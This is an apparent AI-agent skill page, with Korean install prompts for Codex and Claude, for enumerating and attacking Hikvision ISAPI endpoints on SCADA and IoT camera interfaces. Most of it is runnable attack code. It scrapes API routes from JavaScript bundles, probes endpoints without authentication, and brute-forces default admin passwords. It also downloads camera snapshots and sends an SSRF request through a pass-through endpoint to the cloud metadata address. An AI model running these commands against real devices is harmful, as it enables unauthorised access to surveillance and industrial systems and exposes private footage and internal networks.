원클릭으로
scada-hikvision-isapi
Enumerate Hikvision ISAPI endpoints on SCADA and IoT web interfaces.
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
메뉴
Enumerate Hikvision ISAPI endpoints on SCADA and IoT web interfaces.
Codex 또는 Claude로 설치 이 Prompt를 복사해 Codex, Claude 또는 다른 어시스턴트에 붙여 넣으면 Skill 페이지를 검토하고 설치를 진행할 수 있습니다.
Attack SAML SSO via XSW, signature strip, metadata extract.
Chain multiple vulns into critical impact attack paths.
Execute optimal kill chains for WordPress full compromise.
Escape Docker containers to host root via 5 techniques.
Catalog: 25 attacks, 18 WP, 8 CORS to match findings.
7-phase pentest pipeline from passive recon to exploitation.
| name | scada-hikvision-isapi |
| description | Enumerate Hikvision ISAPI endpoints on SCADA and IoT web interfaces. |
| version | 1.0.0 |
| author | uphiago |
| license | MIT |
| platforms | ["linux"] |
| compatibility | Requires curl, nmap, python3 |
| metadata | {"tags":["recon","SCADA","Hikvision","ISAPI","IoT","camera","RTSP","ONVIF","industrial"],"category":"recon","related_skills":["port-service-discovery","hunt-ssrf","iot-camera-recon","js-secrets-extraction"]} |
Enumerate Hikvision ISAPI (Intelligent Security Application Programming Interface) endpoints on industrial control and surveillance web interfaces. Hikvision devices and HikCentral Professional deployments expose a rich REST/XML API at predictable paths. While most endpoints require authentication (CAS session token, Basic auth, or Digest auth), unauthenticated enumeration reveals the device type, firmware baseline, available modules, and potential attack surface. JavaScript bundles often contain the full ISAPI route tree.
/ISAPI/, Bumblebee, or Streaming/channels.Common/common.js, Common/components.js, or Common/vendorGraph.js from a relative path.terminal tool with curl, python3, and nmap.# Fingerprint the web interface
curl -skI "https://TARGET:PORT/" | grep -iE "server|x-powered"
# Download the main JS bundle and scan for ISAPI endpoints
curl -sk "https://TARGET:PORT/" | grep -oP 'src="([^"]+\.js[^"]*)"' | while read -r match; do
js_url=$(echo "$match" | grep -oP '(\./[^"]+\.js[^"]*|/[^"]+\.js[^"]*)')
[ -n "$js_url" ] && curl -sk "https://TARGET:PORT$js_url" | grep -oP '/ISAPI/[^"'\''\s]{5,80}' | sort -u
done
Hikvision web clients embed the complete API route tree in JavaScript:
# Download all JS files referenced in the main page
curl -sk "https://TARGET:PORT/" | python3 -c "
import sys, re, requests, urllib3
urllib3.disable_warnings()
html = sys.stdin.read()
base = 'https://TARGET:PORT'
# Find all JS files
scripts = set(re.findall(r'(?:src|href)=\"([^\"]+\.js[^\"]*)\"', html))
for js in scripts:
url = js if js.startswith('http') else f'{base}{js}' if js.startswith('/') else f'{base}/{js}'
try:
r = requests.get(url, verify=False, timeout=10)
if r.status_code == 200:
# Extract ISAPI paths
paths = set(re.findall(r'/ISAPI/[A-Za-z0-9_/]+', r.text))
if paths:
print(f'\n{url} ({len(r.text)} bytes):')
for p in sorted(paths)[:30]:
print(f' {p}')
except: pass
"
Test extracted ISAPI paths without authentication:
ISAPI_PATHS=(
"/ISAPI/Bumblebee/Platform/V0/KeepLive"
"/ISAPI/Bumblebee/Platform/V0/CAS/SlaveSession"
"/ISAPI/Bumblebee/Platform/V1/RecentlyVisitedMenu"
"/ISAPI/Bumblebee/Platform/V1/SystemConfig/SceneConfig"
"/ISAPI/Bumblebee/Platform/V0/LogicalResource/CameraElements/"
"/ISAPI/Bumblebee/DeviceResource/V0/Servers/RecordServers/"
"/ISAPI/Bumblebee/DeviceResource/V1/PhysicalResource/Devices/"
"/ISAPI/Bumblebee/Platform/V1/Storage/LocalCloudStorageConfig"
"/ISAPI/Bumblebee/Platform/V1/Permission/Security/UserPermission"
"/ISAPI/Bumblebee/Platform/V0/RSM/Sites/"
"/ISAPI/Streaming/channels/101/picture"
"/ISAPI/ContentMgmt/StreamingProxy/channel/"
"/ISAPI/ContentMgmt/download"
)
for path in "${ISAPI_PATHS[@]}"; do
response=$(curl -sk -w "\n%{http_code}" "https://TARGET:PORT$path" 2>/dev/null)
code=$(echo "$response" | tail -1)
body=$(echo "$response" | head -n -1)
echo "=== $path ($code) ==="
echo "$body" | head -5
# Decode error codes
if echo "$body" | grep -q "ErrorCode"; then
error=$(echo "$body" | grep -oP 'ErrorCode\"?\s*[:\s]*(\d+)' | grep -oP '\d+')
case $error in
216) echo " → SESSION_ERROR (auth required)";;
401) echo " → UNAUTHORIZED";;
403) echo " → FORBIDDEN";;
404) echo " → NOT_FOUND";;
*) echo " → Code $error";;
esac
fi
done
Test common credential patterns:
# XML-based CAS session login
curl -sk -X POST "https://TARGET:PORT/ISAPI/Bumblebee/Platform/V0/CAS/SlaveSession" \
-H "Content-Type: application/xml" \
-d '<?xml version="1.0" encoding="UTF-8"?>
<SessionLogin xmlns="http://www.isapi.org/ver20/XMLSchema" version="2.0">
<userName>admin</userName>
<password>PASSWORD</password>
<sessionList><session><id>1</id></session></sessionList>
</SessionLogin>'
# JSON-based login
curl -sk -X POST "https://TARGET:PORT/ISAPI/Bumblebee/Platform/V0/User/Login" \
-H "Content-Type: application/json" \
-d '{"userName":"admin","password":"PASSWORD"}'
# Test default passwords
for pw in admin 12345 123456 password admin123 Hikvision123 hikvision; do
code=$(curl -sk -o /dev/null -w "%{http_code}" \
"https://TARGET:PORT/ISAPI/Bumblebee/Platform/V0/KeepLive" \
-u "admin:$pw")
[ "$code" != "401" ] && echo "Basic auth: admin:$pw → $code"
done
If camera channels are accessible:
# Try camera snapshots (channel 1-16)
for ch in 1 101 201 301; do
curl -sk "https://TARGET:PORT/ISAPI/Streaming/channels/$ch/picture" \
-o "camera_$ch.jpg"
[ -s "camera_$ch.jpg" ] && echo "Snapshot ch$ch: $(wc -c < camera_$ch.jpg) bytes"
done
# Check for RTSP streaming info
curl -sk "https://TARGET:PORT/ISAPI/Streaming/channels/" | head -20
# ONVIF service discovery
curl -sk -X POST "https://TARGET:PORT/onvif/device_service" \
-H "Content-Type: application/soap+xml" \
-d '<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Body><GetServices xmlns="http://www.onvif.org/ver10/device/wsdl"/>
</s:Body></s:Envelope>'
Prioritize these endpoints which may enable SSRF, data access, or privilege escalation:
# HTTP pass-through (potential SSRF)
curl -sk -X POST "https://TARGET:PORT/ISAPI/Bumblebee/Platform/V1/DAM/HTTPPassThrough" \
-H "Content-Type: application/json" \
-d '{"url":"http://169.254.169.254/"}'
# Cloud storage configuration exposure
curl -sk "https://TARGET:PORT/ISAPI/Bumblebee/Platform/V1/Storage/LocalCloudStorageConfig"
# User permission enumeration
curl -sk "https://TARGET:PORT/ISAPI/Bumblebee/Platform/V1/Permission/Security/UserPermission"
# Remote site management
curl -sk "https://TARGET:PORT/ISAPI/Bumblebee/Platform/V0/RSM/Sites/"
ws://127.0.0.1: for local WebSocket connections. External WebSocket endpoints may use different ports.nmap -sU -p 554 for UDP RTSP detection.port-service-discovery — Detecting Hikvision/RTSP/ONVIF ports.hunt-ssrf — Exploiting the HTTPPassThrough proxy for SSRF.iot-camera-recon — General IP camera reconnaissance patterns.js-secrets-extraction — Extracting API keys and tokens from JS bundles that may authenticate ISAPI requests.